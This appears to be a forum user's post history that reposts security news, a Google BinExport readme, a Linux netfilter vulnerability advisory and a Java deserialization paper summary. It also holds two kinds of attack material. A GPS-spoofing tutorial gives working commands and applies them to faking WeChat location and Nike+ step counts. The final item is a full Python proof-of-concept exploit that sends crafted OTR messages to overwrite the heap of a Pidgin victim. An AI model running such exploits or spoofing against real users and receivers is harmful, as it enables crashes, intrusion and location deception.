Everything posted by Nytro
-
BinExport

Copyright 2011-2016 Google Inc.

Disclaimer: This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.

Introduction

BinExport is the exporter component of the BinNavi project. It is a plugin for the commercial IDA Pro disassembler and exports disassemblies into the PostgreSQL database format that BinNavi requires. A previous version (zynamics_binexport_8) also ships with BinDiff, serving a similar purpose.

This repository contains the complete source code necessary to build the IDA Pro plugin for Linux, Windows and OS X.

Installation

Download the binaries from the release page and copy them into the IDA Pro plugins directory. These are the default paths:

OS       Plugin path
Linux    /opt/ida-6.9/plugins
OS X     /Applications/IDA Pro 6.9/idabin/plugins
Windows  %ProgramFiles(x86)%\IDA 6.9\plugins

Note (Windows only): Due to the way the BinExport build works currently, you also have to copy the PostgreSQL client library and SSL libraries to the IDA installation directory. See the "Build BinExport" section below.

Sursa: https://github.com/google/binexport
-
GPS hacking (PART 1)

Author: virustracker
Time: February 4, 2016
Category: default
Author: Kevin2600
From: http://drops.wooyun.org/tips/11155

0x00 Preface

GPS hacking has always been a hot topic at security conferences over the past few years. But the content is overly academic and the cost of the necessary equipment is too high, which stops many fans from getting started. The appearance of some open source projects, such as GPS-SDR-SIM, and the keynote speech given by @Wang Kang at Blackhat Europe 2015 have pierced the veil of GPS. This means any user who is interested in this topic will truly be able to have a try at GPS hacking.

I believe many of you have heard of a powerful tool called Software Defined Radio (SDR) in GPS research. But a new USRP is very expensive, until we found an amazing TV dongle named RTL-SDR. Some time ago, everyone enjoyed using it to watch "adult channels". In view of its hardware constraints, it can only be used to receive data. However, HackRF and BladeRF support both receiving and sending data, and besides, they are cheaper than USRP. Of course, HackRF and BladeRF support different frequencies and sample rates. Therefore, these two have become the first choice of radio fans. The most important thing about BladeRF is that it is full duplex. Here is a comparison between several SDR devices. You may purchase as you need.

Brief introduction of the GPS system

The GPS system is very complex and involves many fields of satellite communications. Here is just a brief introduction. The GPS we are talking about was built by the U.S. Department of Defense. Currently there are 31 satellites working simultaneously in space. Normally we need at least 4 satellites to complete triangulation positioning. All satellites broadcast both L1 signals for civil use and L2 signals for military use at the same time. What we often use is the 1575.42MHz ultra high frequency, which is the unencrypted L1 signal for civil use. GPS signals include 3 kinds of information:

- Pseudorandom code: a simple ID code used to identify each satellite.
- Ephemeris data: includes information about the time and status of satellites, which plays an important role in calculating the position of each satellite.
- Almanac data: includes information about satellite orbits and the specific position that a satellite will be at at a given time.

0x01 Process to forge GPS signals with BladeRF

1.1 Install the BladeRF tools on Ubuntu 14.04.3

install the header file

install BladeRF firmware & FPGA image

After installation, you may notice a hostedX40.rbf and a bladerf_fw.img in /usr/share/nuand/BladeRF/. Here you can insert the BladeRF into a USB port. Normally the system will automatically load the FPGA image. Or it can be manually loaded by entering bladerf_cli -l /path/hostedX40.rbf on the command line. When the image is loaded successfully, 3 LEDs on the BladeRF board will illuminate; meanwhile, we can add a -p parameter to further verify that the system installation is successful.

1.2 Install GPS-SDR-SIM

git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim

Set up latitude and longitude, then generate a data sample. Note that the I/O baseband signal here is 16. Afterwards, gps-sdr-sim will generate data files with the latitude and longitude data automatically. Then we will be able to send the forged GPS data through bladerf_cli.

1.3 Running time issue of GPS-SDR-SIM

In a practical test, @Wangwang found that the GPS simulator can only work continuously for five minutes by default. By viewing its source code, we realized this problem is caused by the default settings of the program. The program is designed to use less hard drive space and will only generate 300 seconds of data by default. We could modify its parameter to extend the working time. But 15 minutes of data will be up to 5GB.

0x02 Forging GPS signals in practice

@Wangwang has shared several practical test cases here. Whoever is interested may have a try.

2.1 Search for girls through WeChat People Nearby

I heard that a lot of programmers have little time to hang out with the queen of their heart due to work pressure and introverted personality. And WeChat People Nearby perfectly solves this problem for people like that. All you need is to turn on the GPS of your phone, then you'll have a chance to say hello to the girls nearby. But the drawback is that the maximum range is limited to within a dozen miles. For those kings of emotion, the stage is too small. Here @Wangwang presents the first case of forging GPS signals: searching for girls through WeChat People Nearby. Rumor says a campaign held several days ago in Sanya, Hainan gathered a town of beauties. @Wangwang can't help but wonder how they look. Let's try WeChat People Nearby! Before sending the forged GPS coordinates, @Wangwang only got the girls in the same city. Then @Wangwang started to send the forged GPS coordinates. 5 minutes later, the girls in Sanya turned up. LOL... @Wangwang sighed that a tech geek can change his life.

2.2 Forge Nike+ step counts

Many friends who are fond of mobile security must have read a post called "using Android Hook to cheat WeChat sports" (http://drops.wooyun.org/tips/8416) written by @Zheng Mi. In this post, he mentioned that he used Android Hook to cheat on step counts so as to beat his friends' records. But this method needs you to root your phone and install some relevant cheating plugins. For other step counting software, these plugins need to be modified accordingly. Here the test target is Nike+ Running. Let's see a video first. This video is sped up to save time.

http://player.youku.com/player.php/sid/XMTQwMzAxMTk4OA==/v.swf

By browsing the home page of GPS-SDR-SIM, we learn that the forged GPS latitude and longitude data can be static or dynamic. To succeed in simulating a motion trail, we have to forge dynamic GPS latitude and longitude data, which can be done with the following parameters:

gps-sdr-sim -e brdc3540.14n -u circle.csv -b 16

As you can see, the step counting app Nike+ is fooled by directly forging GPS signals. You'll be the top scorer even if you are in bed. But, of course, @Wangwang wishes you would really join in running and enjoy the joy of sports.

2.3 Range test on forged signals

From the aforementioned experiments, we know that a GPS receiver can accept software-simulated signals within a short distance. Then what about the performance of the GPS receiver at a larger scale? How far can the effective distance reach? Of course, it depends on output power, antenna gain and signal interference from nearby signals. So @Wangwang only presents a simple indoor test here. Actual conditions prevail. Please watch this video first.

http://player.youku.com/player.php/sid/XMTQwMzAwNzMxNg==/v.swf

As can be seen from the video, the latitude and longitude of the GPS receiver are successfully changed in a 25-meter long linear corridor without any obstacles. Normally, real GPS signals coming from 20,000 meters high are already weak, and almost no signal is detected indoors. Therefore, an indoor GPS signal forging attack can be pretty effective.

0x03 Summary

Based on the above cases, I believe you have more or less learned something about forging GPS signals. But as far as GPS itself goes, this is a very fun and esoteric area. More GPS related products are emerging on the market and each will respond differently to GPS deceiving attacks. Everybody can use their imagination and try different tricks. Finally, I'd like to extend my thanks to @osqzss, @Wang Kang and countless GNURadio enthusiasts for their unselfish sharing. It's because of them that we have the chance to experience the charm of software defined radio. I recommend to you the home page of the GPS-SDR-SIM project and the presentation given by @Wang Kang at Blackhat. Those who have HackRF equipment can read the post "Hijack GPS positioning & hijack WIFI positioning" by @lxj616.

0x04 References

http://drops.wooyun.org/tips/10580
https://github.com/osqzss/gps-sdr-sim
https://en.wikipedia.org/wiki/GPS_signals
"Time and Position Spoofing with Open Source Projects", Kang Wang
http://www.taylorkillian.com/2013/08/sdr-showdown-hackrf-vs-bladerf-vs-usrp.html

Sursa: http://en.wooyun.io/2016/02/04/41.html
-
Linux netfilter IPT_SO_SET_REPLACE memory corruption

A memory corruption vulnerability exists in the IPT_SO_SET_REPLACE ioctl in the netfilter code for iptables support. This ioctl can be triggered by an unprivileged user on PF_INET sockets when unprivileged user namespaces are available (CONFIG_USER_NS=y). Android does not enable this option, but desktop/server distributions and Chrome OS will commonly enable this to allow for containers support or sandboxing.

In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset:

    newpos = pos + e->next_offset;
    ...
    e = (struct ipt_entry *) (entry0 + newpos);
    e->counters.pcnt = pos;

This means that an out of bounds 32-bit write can occur in a 64kb range from the allocated heap entry, with a controlled offset and a partially controlled write value ("pos") or zero. The attached proof-of-concept (netfilter_setsockopt_v3.c) triggers the corruption multiple times to set adjacent heap structures to zero.

This issue affects (at least) kernel versions 3.10, 3.18 and 4.4. It appears that a similar codepath is accessible via arp_tables.c/ARPT_SO_SET_REPLACE as well.

Furthermore, a recent refactoring of this codepath (https://github.com/torvalds/linux/commit/2e4e6a17af35be359cc8f1c924f8f198fbd478cc) introduced an integer overflow in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. The attached proof-of-concept (netfilter_setsockopt_v4.c) triggers this issue on 4.4.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachments: netfilter_setsockopt_v3.c (2.0 KB), netfilter_setsockopt_v4.c (1.3 KB)

Sursa: https://code.google.com/p/google-security-research/issues/detail?id=758
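The snippet quoted in the advisory adds a user-supplied next_offset to a heap pointer and writes through it without any bound. The C below is an added illustration, not the kernel's code and not the upstream fix: it walks a blob of variable-length entries with the checks such a traversal needs before writing through the computed pointer, and shows the 32-bit size wrap the advisory attributes to xt_alloc_table_info. The struct entry layout, the zero-next_offset end-of-chain convention and the demo_walk helper are constructed stand-ins for struct ipt_entry and the mark_source_chains traversal.

```c
/* Added illustration, not kernel code: bounded traversal of user-supplied
 * entries, plus an overflow-checked allocation size for a 32-bit host. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct entry {               /* constructed stand-in for struct ipt_entry */
    uint32_t pcnt;           /* the counter the vulnerable code wrote through */
    uint16_t next_offset;    /* user-controlled distance to the next entry */
    uint16_t pad;
};

#define ENTRY_ALIGN 4u

/* Follow next_offset links from `pos` through a blob of `size` bytes and
 * write the predecessor offset into each reached entry's counter (the write
 * the advisory describes). Returns the number of counters written, or -1 as
 * soon as a link would leave the blob, overlap its own entry or misalign.
 * A next_offset of 0 ends the chain (a convention of this example only). */
int walk_chain_checked(uint8_t *blob, size_t size, size_t pos)
{
    int written = 0;

    for (;;) {
        struct entry *e;
        size_t newpos;

        /* The header must fit before next_offset is read from it. */
        if (pos > size || size - pos < sizeof(struct entry))
            return -1;
        e = (struct entry *)(blob + pos);
        if (e->next_offset == 0)
            return written;

        /* Missing in the vulnerable code: bound the target before writing. */
        if (e->next_offset < sizeof(struct entry))        /* would overlap */
            return -1;
        newpos = pos + e->next_offset;                    /* size_t: no wrap */
        if (newpos > size || size - newpos < sizeof(struct entry))
            return -1;                                    /* leaves the blob */
        if (newpos % ENTRY_ALIGN != 0)
            return -1;                                    /* misaligned entry */

        e = (struct entry *)(blob + newpos);
        e->pcnt = (uint32_t)pos;   /* now provably inside [blob, blob + size) */
        written++;
        pos = newpos;
    }
}

/* Header-plus-rules allocation size as a 32-bit host computes it. The
 * unchecked form silently wraps to a small value; the checked form
 * returns 0 to refuse the request. */
uint32_t table_alloc_size32_unchecked(uint32_t header, uint32_t size)
{
    return header + size;          /* wraps when header + size > 0xFFFFFFFF */
}

uint32_t table_alloc_size32(uint32_t header, uint32_t size)
{
    if (size > UINT32_MAX - header)
        return 0;
    return header + size;
}

/* Build a constructed three-entry blob (24 bytes, 4-byte aligned) whose first
 * two links are off0 and off1 and whose last entry ends the chain, then walk
 * it from offset 0. */
int demo_walk(uint16_t off0, uint16_t off1)
{
    uint32_t words[6];
    uint8_t *blob = (uint8_t *)words;

    memset(words, 0, sizeof words);
    ((struct entry *)(blob + 0))->next_offset = off0;
    ((struct entry *)(blob + 8))->next_offset = off1;
    return walk_chain_checked(blob, sizeof words, 0);
}

int main(void)
{
    printf("well-formed chain: %d counters written\n", demo_walk(8, 8));
    printf("link 0xFFF0 past the blob: %d\n", demo_walk(0xFFF0, 0));
    printf("link 4 overlapping its own entry: %d\n", demo_walk(4, 0));
    printf("misaligned link 10: %d\n", demo_walk(10, 0));
    printf("32-bit size wrap: unchecked=%u checked=%u\n",
           table_alloc_size32_unchecked(64, 0xFFFFFFF0),
           table_alloc_size32(64, 0xFFFFFFF0));
    return 0;
}
```

The three rejections correspond to the three ways a bogus next_offset can hurt: a target past the end of the allocation (the 64kb out-of-bounds write in the advisory), a target inside the current entry, and an unaligned target; the size helper shows why a header-plus-size sum needs an overflow check on 32-bit before it is passed to an allocator.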
-
Caution Urged over Patched Windows USB Driver Flaw

by Michael Mimoso
March 9, 2016, 2:07 pm

USB-related vulnerabilities make people nervous; you need look no further than Stuxnet and BadUSB to see the dangers associated with infected portable storage devices and peripherals.

Yesterday, Microsoft patched a flaw in the Windows USB Mass Storage Class Driver that could put some people on edge. Though the flaw was rated "important," likely because it requires local access to exploit, previous work in this arena shows that such a bug could be attacked remotely.

Andy Davis of NCC Group in the U.K. privately disclosed the flaw, CVE-2016-0133, to Microsoft. His recent research includes a focus on USB bugs that are no longer limited to local exploits. For Black Hat Asia 2014, for example, Davis released a paper explaining techniques that could allow an attacker to take advantage of RDP and RemoteFX USB redirection features in Windows.

Davis, who could not be reached for comment on yesterday's patch, said in his paper that organizations should disable RemoteFX on clients and servers, use granular RemoteFX security controls, and pay attention to "local" USB vulnerabilities.

The one patched yesterday, Microsoft said, can be used to elevate privileges on a compromised machine by an attacker inserting a malicious USB drive into a vulnerable computer. Microsoft said the driver in question fails to properly validate objects in memory.

"An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode," Microsoft said in its advisory. "An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."

Craig Young, a researcher at Tripwire, said the vulnerability likely could be exploited even on a locked workstation.

"Based on the description from Microsoft, insertion of the crafted USB stick would be enough to exploit vulnerable code within the mass storage driver without any further user-interaction," Young said. "The flaw may exist within code responsible for low-level device access as opposed to higher-level filesystem related activities and these activities should take place regardless of whether there is an interactive logon session at the console."

Stuxnet, which was used to disrupt Iran's nuclear program in 2009, spread via infected USB drives, primarily to attack air-gapped machines that the attackers could not reach with any of the zero-day exploits at their disposal. Stuxnet exploited a vulnerability in LNK files, which define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.

"In contrast, the LNK vulnerability exploited by Stuxnet and patched in MS10-046 would require that a victim browse to a malicious folder to trigger code execution," Young said.

Making this vulnerability even more angst-ridden is the kernel access it affords because it's a driver vulnerability. This gives an attacker a direct path to code execution within the kernel rather than in context of a logged in user, Young said.

"Execution within the kernel means that an attacker can hide their tracks, gain persistent access, and dump password hashes or security tokens left on the system," Young said, who added that based on public information, there may not be any limitations to the payload associated with an exploit of this flaw.

"This issue generally presents a large risk in any environment where someone has physical access to a USB port of someone else's system. For example, I regularly see that medical offices will leave patients in a room with a PC containing private health information and that many retail locations have PCs for sales people to check inventory or prepare sales quotes," Young said. "At a larger scale, Windows based data centers could also be heavily affected if server racks are not locked to make USB ports inaccessible to employees or anyone else who makes it into the data center."

Sursa: https://threatpost.com/caution-urged-over-patched-windows-usb-driver-flaw/116683/
-
Microsoft has released a Debian Linux switch OS. Repeat, a Debian Linux switch operating system

Open-source toolkit for wrangling networks

9 Mar 2016 at 18:00, Chris Williams

OCP Summit Put down your coffee gently. Microsoft has today released a homegrown open-source operating system, based on Debian GNU/Linux, that runs on network switches.

The software is dubbed SONiC, aka Software for Open Networking in the Cloud. It's a toolkit of code and kernel patches to bend switch hardware to your will, so you can dictate how it works and what it can do, rather than relying on proprietary firmware from a traditional networking vendor. It also pits Redmond against white-box network operating systems from the likes of HP, Dell, and Cumulus Networks.

SONiC builds upon the Windows giant's Linux-based Azure Cloud Switch (ACS) operating system that we learned about in September. ACS is the brains of switches in Microsoft's Azure cloud: the code can run on all sorts of hardware from different equipment makers, and uses a common C API – the Switch Abstraction Interface (SAI) – to program the specialist chips in the networking gear. This means ACS can control and manage network devices and implement features as required regardless of who made the underlying electronics.

This underlying hardware must therefore implement the SAI, an API that Microsoft contributed to the Open Compute Project (OCP) in 2015. The OCP, launched by Facebook in 2011, encourages hardware manufacturers to produce generic gear to the project's open standards and specifications so large organizations can buy the machines cheaply in bulk and use software to customize and control the gear as they wish.

Redmond – backed by Arista, Broadcom, Dell and Mellanox – now hopes to contribute ACS's sibling SONiC to the OCP so organizations can pick and choose their switch hardware and shape their networks as needed using Redmond's software.

"SONiC is a collection of software networking components required to build network devices like switches," said Azure CTO Mark Russinovich, who will give a keynote at the OCP Summit in San Jose, California, in the next few minutes. "Together with SAI, SONiC will enable cloud operators to take advantage of hardware innovation, while giving them a framework to build upon open source code for applications on the network switch.

"We believe it's the final piece of the puzzle in delivering a fully open sourced switch platform that can share the same software stack across hardware from multiple switch vendors."

SONiC is available for download now from Microsoft's Azure GitHub repo under a mix of open-source licenses including the GNU GPL and the Apache license.

Today's news follows Microsoft's other bombshell this week: a port of SQL Server for Linux, due out in 2017. This is all extremely surprising given the Windows giant was hell bent on destroying Linux until very recently. Now, according to Russinovich, more than 25 per cent of virtual machines running on Azure are Linux-powered, up from 20 per cent six months ago.

Redmond fans insist their favorite IT giant has turned a new leaf, that it no longer likens open-source to cancer and communism, and that it now truly loves Linux. Those of us who found themselves on the business end of Microsoft in the 1990s will be thinking of the old words from a nearly forgotten age. Embrace. Extend... ®

Updated to add

Russinovich has blogged about SONiC here. Meanwhile, Microsoft has said it "has no plans to sell SONiC to customers or provide any network engineering or development support." It also stressed that "SONiC is a collection of networking software components required to have a fully functional L3 device that can be agnostic of any particular Linux distribution. Today SONiC runs on Debian."

Sursa: http://www.theregister.co.uk/2016/03/09/microsoft_sonic_debian/
-
The perils of Java deserialization

alvaro_munoz on 03-04-2016 12:43 PM

Java provides a mechanism called object serialization, which allows an object to be represented as a sequence of bytes that includes the object's data as well as information about the object's type and the types of data stored in the object. The sequence of bytes can be used to deserialize the object graph by using the type information and bytes that represent the object and its data to recreate the object in memory.

Java serialization is used by applications for multiple purposes; furthermore, Java serialization is not only used explicitly in application code. It is also used behind the scenes in many known and popular protocols.

Security issues with Java deserialization have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collections). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic, and other products, and the details were disclosed publicly with no previous notification to vendors. The security community focused on exploring these issues, and as a result mitigation advice was published describing various ways to protect against this kind of attack.

Understanding where and why Java serialization is used in your applications, libraries, and frameworks will greatly help you to design an architecture to prevent this kind of attack. While it is possible (although not always easy) to protect the cases in which Java serialization is explicitly used in your application code, the cases in which it is used by frameworks and libraries may require additional security controls, as we document in this paper.

In our paper, we review the basics of the Java deserialization process and explain how and why it becomes vulnerable. We will show how different Java classes – referred to as gadgets throughout the paper – can be abused by attackers during the deserialization process to compromise or attack applications and servers. We explain how attackers can leverage these gadget classes for their own purposes. We examine several remote code execution gadgets to show how these attacks chain multiple pieces of code to craft the malicious payload. We review available mitigation advice and present a new technique to bypass some of the recommended protections. Finally, we conclude by reviewing how the problem affects similar libraries, and wrap up by offering our own mitigation strategies to more effectively protect against this problem.

Paper: HPE-SR whitepaper java deserialization RSA2016.pdf (2580 KB)

Sursa: http://community.hpe.com/t5/Security-Research/The-perils-of-Java-deserialization/ba-p/6838995#.VuE1pfl96Ul
-
Qubes OS 3.1 has been released!

Mar 9, 2016 by Joanna Rutkowska in Announcements

I'm happy to announce that today we're releasing Qubes OS 3.1!

The major new architectural feature of this release has been the introduction of the Qubes Management infrastructure, which is based on the popular Salt management software. In Qubes 3.1, this management stack makes it possible to conveniently control system-wide Qubes configuration using centralized, declarative statements. Declarative is the key word here: it makes creating advanced configurations significantly simpler. (The user or administrator needs only to specify what they want to get, rather than how they want to get it). This has already allowed us to improve our installation wizard (firstboot) so that it now offers the user the ability to easily select from various options to pre-create some useful configurations, such as Whonix or USB-hosting VMs.

Currently, the management stack is limited to dom0 and system-wide Qubes configuration (i.e. what VMs should be present, with what properties, how connected), and notably missing is the ability to configure/manage states inside the VMs or templates (e.g. what packages are to be installed, or what additional services are to be enabled in the VMs). I think most readers will understand very well that marrying powerful and flexible, yet very complex, management software such as Salt, with a security-focused system like Qubes OS is an extremely sensitive task. This is because we really would not like to negate all the isolation we have previously worked hard to build, obviously. Yet, we have recently come up with – what we believe is – an elegant way to also extend our management stack to cover VMs' internal states. In fact, we already have working code for this and plan on introducing this feature officially in the upcoming Qubes 4.0 release candidate. We might also decide to bring it to the 3.1 release (as an optional update), in case we can't release 4.0-rc1 soon enough.

Once we introduce this missing piece of the Qubes management infrastructure, we will gain almost limitless possibilities for shaping Qubes configurations to fit particular user groups' needs and for delivering them easily.

Besides the management stack, there have been a number of other improvements and bugfixes introduced in 3.1 compared to Qubes 3.0, and most of these have already been mentioned in the original 3.1-rc1 announcement post. To name here just two which might be of critical importance to some users (as they significantly improve hardware compatibility): Qubes 3.1 now supports UEFI-based boot, as well as many new GPUs, thanks to the updated drivers and kernel in Dom0.

The ISO can be downloaded here. As usual, we encourage people to verify the integrity of the downloaded images as explained here. Existing users of the 3.0 and 3.1-rcX releases should be able to easily upgrade without re-installing.

Enjoy!

Sursa: https://www.qubes-os.org/news/2016/03/09/qubes-os-3-1-has-been-released/
-
PoC libotr heap overwrite on Pidgin

#!/usr/bin/python -u
#
### PoC libotr heap overwrite on Pidgin
### 2016-02-17 Markus Vervier
### X41 D-Sec GmbH
### initial code taken from pyxmpp examples (echobot.py)
### PoC was tested using a standard Prosody XMPP-Server on Arch-Linux allowing 20MB sized messages by default (and even larger)
### On a loopback interface the exploit took several minutes,
### using XMPP stream compression this could be reduced massively
### pyxmpp does not support it
### We used XMPP connections without TLS to not further complicate the setup
### USAGE ###
### Prerequisite: 2 Jabber Accounts (attacker, victim), set Ressource of attacker to "attacktest"
### 1. Initiate an encrypted session from attacker-account to victim-account (e.g. using pidgin)
### 2. Disconnect the attacker account
### 3. Fire up this script and let it connect with the attacker account credentials
### 4. Send a message from victim to attacker
### 5. Wait until message sending is complete, pidgin should crash
### !!! Steps 2-5 (and especially user interaction) are only necessary for this PoC
### !!! If we would implement full OTR in this script we could send the bad message directly
### !!! For easier PoC we now wait until an encrypted message is received to get the correct instance tags

import sys
import logging
import locale
import codecs
import os, signal
import time
import base64

def ignore_signal_pipe(signum, frame):
    print 'signal pipe caught -- IGNORING'

signal.signal(signal.SIGPIPE, ignore_signal_pipe)

from struct import *
from pyxmpp.all import JID,Iq,Presence,Message,StreamError
from pyxmpp.jabber.client import JabberClient
from pyxmpp.interface import implements
from pyxmpp.interfaces import *
from pyxmpp.streamtls import TLSSettings
from enum import Enum

class EchoHandler(object):
    """Provides the actual 'echo' functionality.

    Handlers for presence and message stanzas are implemented here.
    """
    implements(IMessageHandlersProvider, IPresenceHandlersProvider)

    def __init__(self, client):
        """Just remember who created this."""
        self.client = client

    def get_message_handlers(self):
        """Return list of (message_type, message_handler) tuples.

        The handlers returned will be called when matching message is
        received in a client session."""
        return [
            ("normal", self.message),
            ]

    def get_presence_handlers(self):
        """Return list of (presence_type, presence_handler) tuples.

        The handlers returned will be called when matching presence stanza
        is received in a client session."""
        return [
            (None, self.presence),
            ("unavailable", self.presence),
            ("subscribe", self.presence_control),
            ("subscribed", self.presence_control),
            ("unsubscribe", self.presence_control),
            ("unsubscribed", self.presence_control),
            ]

    def message(self,stanza):
        """Message handler for the component.

        Echoes the message back if its type is not 'error' or
        'headline', also sets own presence status to the message body.

        Please note that all message types but 'error' will be passed
        to the handler for 'normal' message unless some dedicated handler
        process them.

        :returns: `True` to indicate, that the stanza should not be processed
        any further."""
        subject=stanza.get_subject()
        body=stanza.get_body()
        t=stanza.get_type()
        m = 0
        print u'Message from %s received.' % (unicode(stanza.get_from(),)),

        if subject:
            print u'Subject: "%s".' % (subject,),
        if body:
            print u'Body: "%s".' % (body,),
        if t:
            print u'Type: "%s".' % (t,)
        else:
            print u'Type: "normal".'
        if stanza.get_type()=="headline":
            # 'headline' messages should never be replied to
            return True

        # record instance tag
        if body[:9] == u'?OTR:AAMD':
            (self.instance_tag, self.our_tag) = self.parse_aamc(body[len("?OTR:AAMD"):])
            print "parsed instance tag: %s and our tag %s" % (self.instance_tag.encode("hex"), self.our_tag.encode("hex") )
            self.send_insane_otr(stanza, 1024*1024*20, self.instance_tag, self.our_tag)

        return m

    def b64maxlen(self, chars):
        return 1 + (4 * chars / 3)

    def parse_aamc(self, msg):
        maxlen = self.b64maxlen(8) # 4 byte integer
        print "maxlen %u" % (maxlen)
        tmp = msg[0:maxlen]
        padding = ""
        if maxlen % 4 > 1:
            padding = "="*(4-(maxlen % 4))
        tmp += padding
        print "decoding: "+tmp
        packed = base64.b64decode(tmp)
        # return unpack("I", packed[0:4])
        return (packed[0:4], packed[4:8]) # their tag, our tag

    def initial_body(self, instance_tag, our_tag):
        ret = "?OTR:AAMD";
        raw = b''
        print "packing initial block with instance tag: %s and our tag: %s" % (instance_tag.encode("hex"), our_tag.encode("hex"))
        #dirty hack
        raw += our_tag # sender_nstance_id
        raw += instance_tag # receiver_id
        raw += "D" # dummy flags
        raw += pack("I", 0x1) # sender key id
        raw += pack("I", 0x2) # recipient key id
        raw += pack("!I", 10) # len next_y
        raw += "B"*10 # next_y # we don't know how mpi works but it seems ok ;)
        raw += "12345678" # reveal sig dummy
        # yeah overflow!
        raw += pack("I", 0xFFFFFFFF); # datalen
        ret += base64.b64encode(raw+"A"*(57-len(raw)))
        return ret

    def send_insane_otr(self, stanza, frag_size, instance_tag, our_tag):
        print "G-FUNK!"
        # this should result in about 0xFFFFFFFF times "A" base64 encoded
        len_msg = 5726623060
        # fix frag size for base64
        frag_size = (frag_size / 4) * 4
        frag_msg = "QUFB"*(frag_size / 4)
        n = len_msg / frag_size
        # does not evenly divide?
        if len_msg % frag_size > 0:
            n += 1
        k = 1
        n += 1 # initialbody adds another frame
        initialbody = "?OTR,%hu,%hu,%s," % (k , n , self.initial_body(instance_tag, our_tag))
        print "first fragment: "+initialbody
        m = Message(
            to_jid=stanza.get_from(),
            from_jid=stanza.get_to(),
            stanza_type=stanza.get_type(),
            subject="foo",
            body=initialbody)
        self.client.stream.send(m)
        k += 1
        print "frag size: %s, len_msg: %u, num_frags: %u" % (frag_size, len_msg, n)
        cur_pos = 0
        while(cur_pos < len_msg):
            body = "?OTR,%hu,%hu,%s," % (k , n , frag_msg)
            m = Message(
                to_jid=stanza.get_from(),
                from_jid=stanza.get_to(),
                stanza_type=stanza.get_type(),
                subject="foo",
                body=body)
            print "cur_pos %u of %u" % (cur_pos, len_msg)
            self.client.stream.send(m)
            k += 1
            cur_pos = frag_size * (k-2)
            time.sleep(0.9)
        print "FINAL FRAG: cur_pos %u of %u" % (cur_pos, len_msg)

    def presence(self,stanza):
        """Handle 'available' (without 'type') and 'unavailable' <presence/>."""
        msg=u"%s has become " % (stanza.get_from())
        t=stanza.get_type()
        if t=="unavailable":
            msg+=u"unavailable"
        else:
            msg+=u"available"

        show=stanza.get_show()
        if show:
            msg+=u"(%s)" % (show,)

        status=stanza.get_status()
        if status:
            msg+=u": "+status
        print msg

    def presence_control(self,stanza):
        """Handle subscription control <presence/> stanzas -- acknowledge
        them."""
        msg=unicode(stanza.get_from())
        t=stanza.get_type()
        if t=="subscribe":
            msg+=u" has requested presence subscription."
        elif t=="subscribed":
            msg+=u" has accepted our presence subscription request."
        elif t=="unsubscribe":
            msg+=u" has canceled his subscription of our."
        elif t=="unsubscribed":
            msg+=u" has canceled our subscription of his presence."

        print msg

        return stanza.make_accept_response()

class VersionHandler(object):
    """Provides handler for a version query.

    This class will answer version query and announce 'jabber:iq:version' namespace
    in the client's disco#info results."""

    implements(IIqHandlersProvider, IFeaturesProvider)

    def __init__(self, client):
        """Just remember who created this."""
        self.client = client

    def get_features(self):
        """Return namespace which should the client include in its reply to a
        disco#info query."""
        return ["jabber:iq:version"]

    def get_iq_get_handlers(self):
        """Return list of tuples (element_name, namespace, handler) describing
        handlers of <iq type='get'/> stanzas"""
        return [
            ("query", "jabber:iq:version", self.get_version),
            ]

    def get_iq_set_handlers(self):
        """Return empty list, as this class provides no <iq type='set'/> stanza handler."""
        return []

    def get_version(self,iq):
        """Handler for jabber:iq:version queries.

        jabber:iq:version queries are not supported directly by PyXMPP, so the
        XML node is accessed directly through the libxml2 API.  This should be
        used very carefully!"""
        iq=iq.make_result_response()
        q=iq.new_query("jabber:iq:version")
        q.newTextChild(q.ns(),"name","Echo component")
        q.newTextChild(q.ns(),"version","1.0")
        return iq

class Client(JabberClient):
    """Simple bot (client) example. Uses `pyxmpp.jabber.client.JabberClient`
    class as base. That class provides basic stream setup (including
    authentication) and Service Discovery server. It also does server address
    and port discovery based on the JID provided."""

    def __init__(self, jid, password, tls_cacerts):
        # if bare JID is provided add a resource -- it is required
        if not jid.resource:
            jid=JID(jid.node, jid.domain, "attacktest")

        if tls_cacerts:
            if tls_cacerts == 'tls_noverify':
                tls_settings = TLSSettings(require = True, verify_peer = False)
            else:
                tls_settings = TLSSettings(require = True, cacert_file = tls_cacerts)
        else:
            tls_settings = None

        # setup client with provided connection information
        # and identity data
        JabberClient.__init__(self, jid, password,
                disco_name="PyXMPP example: echo bot", disco_type="bot",
                tls_settings = tls_settings)

        # add the separate components
        self.interface_providers = [
            VersionHandler(self),
            EchoHandler(self),
            ]

    def stream_state_changed(self,state,arg):
        """This one is called when the state of stream connecting the component
        to a server changes. This will usually be used to let the user
        know what is going on."""
        print "*** State changed: %s %r ***" % (state,arg)

    def print_roster_item(self,item):
        if item.name:
            name=item.name
        else:
            name=u""
        print (u'%s "%s" subscription=%s groups=%s'
                % (unicode(item.jid), name, item.subscription,
                    u",".join(item.groups)) )

    def roster_updated(self,item=None):
        if not item:
            print u"My roster:"
            for item in self.roster.get_items():
                self.print_roster_item(item)
            return
        print u"Roster item updated:"
        self.print_roster_item(item)

# XMPP protocol is Unicode-based to properly display data received
# _must_ convert it to local encoding or UnicodeException may be raised
locale.setlocale(locale.LC_CTYPE, "")
encoding = locale.getlocale()[1]
if not encoding:
    encoding = "us-ascii"
sys.stdout = codecs.getwriter(encoding)(sys.stdout, errors = "replace")
sys.stderr = codecs.getwriter(encoding)(sys.stderr, errors = "replace")

# PyXMPP uses `logging` module for its debug output
# applications should set it up as needed
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
